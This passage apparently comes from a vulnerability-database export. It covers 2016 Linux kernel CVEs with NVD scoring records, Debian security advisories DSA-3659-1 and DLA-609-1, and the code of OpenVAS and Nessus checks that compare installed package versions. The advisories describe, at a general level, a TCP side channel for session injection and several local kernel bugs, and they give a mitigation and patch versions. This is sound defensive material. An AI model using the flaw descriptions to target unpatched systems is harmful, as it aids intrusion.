isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp-lpae\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-ixp4xx\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-kirkwood\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-2e\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-2f\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-3\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-octeon\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = 
isdpkgvuln(pkg:\"linux-image-3.16.0-4-orion5x\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc-smp\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc64\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc64le\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-r4k-ip22\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-r5k-ip32\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-s390x\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-s390x-dbg\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-sb1-bcm91250a\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-versatile\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-4kc-malta\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-5kc-malta\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-loongson-2f\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-octeon\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += 
res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r4k-ip22\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-cobalt\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-ip32\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1-bcm91250a\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1a-bcm91480b\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-manual-3.16\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-source-3.16\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-support-3.16.0-4\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-linux-system-3.16.0-4-amd64\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "naslFamily": "Debian Local Security Checks"}
{"cve": [{"lastseen": "2021-02-02T06:28:09", "description": "net/ipv4/tcp_input.c in the Linux kernel before 4.7 does not properly determine the rate of challenge ACK segments, which makes it easier for remote attackers to hijack TCP sessions via a blind in-window attack.", "edition": 7, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 4.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 2.5}, "published": "2016-08-06T20:59:00", "title": "CVE-2016-5696", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5696"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/a:oracle:vm_server:3.3", "cpe:/o:linux:linux_kernel:4.6.6", "cpe:/o:google:android:7.0", "cpe:/a:oracle:vm_server:3.4"], "id": "CVE-2016-5696", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5696", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_server:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_server:3.4:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:09", "description": "Race condition in the audit_log_single_execve_arg function in 
kernel/auditsc.c in the Linux kernel through 4.7 allows local users to bypass intended character-set restrictions or disrupt system-call auditing by changing a certain string, aka a \"double fetch\" vulnerability.", "edition": 6, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-06T20:59:00", "title": "CVE-2016-6136", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6136"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/o:linux:linux_kernel:4.7"], "id": "CVE-2016-6136", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6136", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.7:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:10", "description": "Race condition in the ioctl_send_fib function in drivers/scsi/aacraid/commctrl.c in the Linux kernel through 4.7 allows local users to cause a denial of service (out-of-bounds access or system crash) by changing a certain size value, aka a \"double fetch\" vulnerability.", "edition": 6, "cvss3": {"exploitabilityScore": 1.4, "cvssV3": {"baseSeverity": "MEDIUM", 
"confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-06T20:59:00", "title": "CVE-2016-6480", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6480"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/o:linux:linux_kernel:4.7"], "id": "CVE-2016-6480", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6480", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.7:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:10", "description": "The tcp_check_send_head function in include/net/tcp.h in the Linux kernel before 4.7.5 does not properly maintain certain SACK state after a failed data copy, which allows local users to cause a denial of service (tcp_xmit_retransmit_queue use-after-free and system crash) via a crafted SACK option.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", 
"userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-10-16T21:59:00", "title": "CVE-2016-6828", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6828"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/o:linux:linux_kernel:4.7.4"], "id": "CVE-2016-6828", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6828", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.7.4:*:*:*:*:*:*:*"]}], "android": [{"lastseen": "2020-06-22T14:42:12", "bulletinFamily": "software", "cvelist": ["CVE-2016-6828"], "description": "The tcp_check_send_head function in include/net/tcp.h in the Linux kernel before 4.7.5 does not properly maintain certain SACK state after a failed data copy, which allows local users to cause a denial of service (tcp_xmit_retransmit_queue use-after-free and system crash) via a crafted SACK option.", "edition": 1, "modified": "2019-07-29T00:00:00", "published": "2016-11-01T00:00:00", "id": "ANDROID:CVE-2016-6828", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2016-6828.html", "title": "CVE-2016-6828", "type": "android", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "debian": [{"lastseen": "2020-08-12T00:57:39", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-5696", "CVE-2016-6136", "CVE-2016-6828"], "description": "- -------------------------------------------------------------------------\nDebian Security 
Advisory DSA-3659-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nSeptember 04, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : linux\nCVE ID : CVE-2016-5696 CVE-2016-6136 CVE-2016-6480 CVE-2016-6828\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or have other\nimpacts.\n\nCVE-2016-5696\n\n Yue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and Srikanth V.\n Krishnamurthy of the University of California, Riverside; and Lisa\n M. Marvel of the United States Army Research Laboratory discovered\n that Linux's implementation of the TCP Challenge ACK feature\n results in a side channel that can be used to find TCP connections\n between specific IP addresses, and to inject messages into those\n connections.\n\n Where a service is made available through TCP, this may allow\n remote attackers to impersonate another connected user to the\n server or to impersonate the server to another connected user. In\n case the service uses a protocol with message authentication\n (e.g. TLS or SSH), this vulnerability only allows denial of\n service (connection failure). An attack takes tens of seconds, so\n short-lived TCP connections are also unlikely to be vulnerable.\n\n This may be mitigated by increasing the rate limit for TCP\n Challenge ACKs so that it is never exceeded:\n sysctl net.ipv4.tcp_challenge_ack_limit=1000000000\n\nCVE-2016-6136\n\n Pengfei Wang discovered that the audit subsystem has a\n 'double-fetch' or 'TOCTTOU' bug in its handling of special\n characters in the name of an executable. 
Where audit logging of\n execve() is enabled, this allows a local user to generate\n misleading log messages.\n\nCVE-2016-6480\n\n Pengfei Wang discovered that the aacraid driver for Adaptec RAID\n controllers has a 'double-fetch' or 'TOCTTOU' bug in its\n validation of 'FIB' messages passed through the ioctl() system\n call. This has no practical security impact in current Debian\n releases.\n\nCVE-2016-6828\n\n Marco Grassi reported a 'use-after-free' bug in the TCP\n implementation, which can be triggered by local users. The\n security impact is unclear, but might include denial of service or\n privilege escalation.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 3.16.36-1+deb8u1. In addition, this update contains several\nchanges originally targeted for the upcoming jessie point release.\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 18, "modified": "2016-09-04T17:25:13", "published": "2016-09-04T17:25:13", "id": "DEBIAN:DSA-3659-1:3F508", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00238.html", "title": "[SECURITY] [DSA 3659-1] linux security update", "type": "debian", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-05-30T02:21:24", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-7118", "CVE-2016-5696", "CVE-2016-3857", "CVE-2016-6136", "CVE-2016-6828", "CVE-2016-5829", "CVE-2016-4470"], "description": "Package : linux\nVersion : 3.2.81-2\nCVE ID : CVE-2016-3857 CVE-2016-4470 CVE-2016-5696 CVE-2016-5829 \n CVE-2016-6136 CVE-2016-6480 CVE-2016-6828 CVE-2016-7118\nDebian Bug : 827561\n\nThis update fixes the CVEs described below.\n\nCVE-2016-3857\n\n Chiachih Wu 
reported two bugs in the ARM OABI compatibility layer\n that can be used by local users for privilege escalation. The\n OABI compatibility layer is enabled in all kernel flavours for\n armel and armhf.\n\nCVE-2016-4470\n\n Wade Mealing of the Red Hat Product Security Team reported that\n in some error cases the KEYS subsystem will dereference an\n uninitialised pointer. A local user can use the keyctl()\n system call for denial of service (crash) or possibly for\n privilege escalation.\n\nCVE-2016-5696\n\n Yue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and Srikanth V.\n Krishnamurthy of the University of California, Riverside; and Lisa\n M. Marvel of the United States Army Research Laboratory discovered\n that Linux's implementation of the TCP Challenge ACK feature\n results in a side channel that can be used to find TCP connections\n between specific IP addresses, and to inject messages into those\n connections.\n\n Where a service is made available through TCP, this may allow\n remote attackers to impersonate another connected user to the\n server or to impersonate the server to another connected user. In\n case the service uses a protocol with message authentication\n (e.g. TLS or SSH), this vulnerability only allows denial of\n service (connection failure). An attack takes tens of seconds, so\n short-lived TCP connections are also unlikely to be vulnerable.\n\n This may be mitigated by increasing the rate limit for TCP\n Challenge ACKs so that it is never exceeded:\n sysctl net.ipv4.tcp_challenge_ack_limit=1000000000\n\nCVE-2016-5829\n\n Several heap-based buffer overflow vulnerabilities were found in\n the hiddev driver, allowing a local user with access to a HID\n device to cause a denial of service or potentially escalate their\n privileges.\n\nCVE-2016-6136\n\n Pengfei Wang discovered that the audit subsystem has a\n 'double-fetch' or 'TOCTTOU' bug in its handling of special\n characters in the name of an executable. 
Where audit logging of\n execve() is enabled, this allows a local user to generate\n misleading log messages.\n\nCVE-2016-6480\n\n Pengfei Wang discovered that the aacraid driver for Adaptec RAID\n controllers has a 'double-fetch' or 'TOCTTOU' bug in its\n validation of 'FIB' messages passed through the ioctl() system\n call. This has no practical security impact in current Debian\n releases.\n\nCVE-2016-6828\n\n Marco Grassi reported a 'use-after-free' bug in the TCP\n implementation, which can be triggered by local users. The\n security impact is unclear, but might include denial of service or\n privilege escalation.\n\nCVE-2016-7118\n\n Marcin Szewczyk reported that calling fcntl() on a file descriptor\n for a directory on an aufs filesystem would result in an 'oops'.\n This allows local users to cause a denial of service. This is a\n Debian-specific regression introduced in version 3.2.81-1.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n3.2.81-2. This version also fixes a build failure (bug #827561) for\ncustom kernels with CONFIG_MODULES disabled, a regression in version\n3.2.81-1. 
It also updates the PREEMPT_RT featureset to version\n3.2.81-rt117.\n\nFor Debian 8 "Jessie", CVE-2016-3857 has no impact; CVE-2016-4470 and\nCVE-2016-5829 were fixed in linux version 3.16.7-ckt25-2+deb8u3 or\nearlier; and the remaining issues are fixed in version 3.16.36-1+deb8u1.\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n-- \nBen Hutchings - Debian developer, member of kernel, installer and LTS teams", "edition": 3, "modified": "2016-09-03T11:54:21", "published": "2016-09-03T11:54:21", "id": "DEBIAN:DLA-609-1:1025A", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201609/msg00002.html", "title": "[SECURITY] [DLA 609-1] linux security update", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-12T09:49:47", "description": "Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or have other\nimpacts.\n\n - CVE-2016-5696\n Yue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and\n Srikanth V. Krishnamurthy of the University of\n California, Riverside; and Lisa M. Marvel of the United\n States Army Research Laboratory discovered that Linux's\n implementation of the TCP Challenge ACK feature results\n in a side channel that can be used to find TCP\n connections between specific IP addresses, and to inject\n messages into those connections.\n\n Where a service is made available through TCP, this may allow remote\n attackers to impersonate another connected user to the server or to\n impersonate the server to another connected user. In case the\n service uses a protocol with message authentication (e.g. TLS or\n SSH), this vulnerability only allows denial of service (connection\n failure). 
An attack takes tens of seconds, so short-lived TCP\n connections are also unlikely to be vulnerable.\n\n This may be mitigated by increasing the rate limit for TCP Challenge\n ACKs so that it is never exceeded: sysctl\n net.ipv4.tcp_challenge_ack_limit=1000000000\n\n - CVE-2016-6136\n Pengfei Wang discovered that the audit subsystem has a\n 'double-fetch' or 'TOCTTOU' bug in its handling of\n special characters in the name of an executable. Where\n audit logging of execve() is enabled, this allows a\n local user to generate misleading log messages.\n\n - CVE-2016-6480\n Pengfei Wang discovered that the aacraid driver for\n Adaptec RAID controllers has a 'double-fetch' or\n 'TOCTTOU' bug in its validation of 'FIB' messages passed\n through the ioctl() system call. This has no practical\n security impact in current Debian releases.\n\n - CVE-2016-6828\n Marco Grassi reported a 'use-after-free' bug in the TCP\n implementation, which can be triggered by local users.\n The security impact is unclear, but might include denial\n of service or privilege escalation.", "edition": 26, "cvss3": {"score": 5.5, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-09-06T00:00:00", "title": "Debian DSA-3659-1 : linux - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-5696", "CVE-2016-6136", "CVE-2016-6828"], "modified": "2016-09-06T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:linux"], "id": "DEBIAN_DSA-3659.NASL", "href": "https://www.tenable.com/plugins/nessus/93324", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3659. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93324);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-5696\", \"CVE-2016-6136\", \"CVE-2016-6480\", \"CVE-2016-6828\");\n script_xref(name:\"DSA\", value:\"3659\");\n\n script_name(english:\"Debian DSA-3659-1 : linux - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or have other\nimpacts.\n\n - CVE-2016-5696\n Yue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and\n Srikanth V. Krishnamurthy of the University of\n California, Riverside; and Lisa M. Marvel of the United\n States Army Research Laboratory discovered that Linux's\n implementation of the TCP Challenge ACK feature results\n in a side channel that can be used to find TCP\n connections between specific IP addresses, and to inject\n messages into those connections.\n\n Where a service is made available through TCP, this may allow remote\n attackers to impersonate another connected user to the server or to\n impersonate the server to another connected user. In case the\n service uses a protocol with message authentication (e.g. TLS or\n SSH), this vulnerability only allows denial of service (connection\n failure). 
An attack takes tens of seconds, so short-lived TCP\n connections are also unlikely to be vulnerable.\n\n This may be mitigated by increasing the rate limit for TCP Challenge\n ACKs so that it is never exceeded: sysctl\n net.ipv4.tcp_challenge_ack_limit=1000000000\n\n - CVE-2016-6136\n Pengfei Wang discovered that the audit subsystem has a\n 'double-fetch' or 'TOCTTOU' bug in its handling of\n special characters in the name of an executable. Where\n audit logging of execve() is enabled, this allows a\n local user to generate misleading log messages.\n\n - CVE-2016-6480\n Pengfei Wang discovered that the aacraid driver for\n Adaptec RAID controllers has a 'double-fetch' or\n 'TOCTTOU' bug in its validation of 'FIB' messages passed\n through the ioctl() system call. This has no practical\n security impact in current Debian releases.\n\n - CVE-2016-6828\n Marco Grassi reported a 'use-after-free' bug in the TCP\n implementation, which can be triggered by local users.\n The security impact is unclear, but might include denial\n of service or privilege escalation.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-5696\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-6136\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-6480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-6828\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/linux\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3659\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the linux packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 
3.16.36-1+deb8u1. In addition, this update contains several\nchanges originally targeted for the upcoming jessie point release.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.8-arm\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.8-x86\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.9-x86\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-doc-3.16\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-586\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-686-pae\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-amd64\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-armel\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-armhf\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-i386\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-amd64\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", 
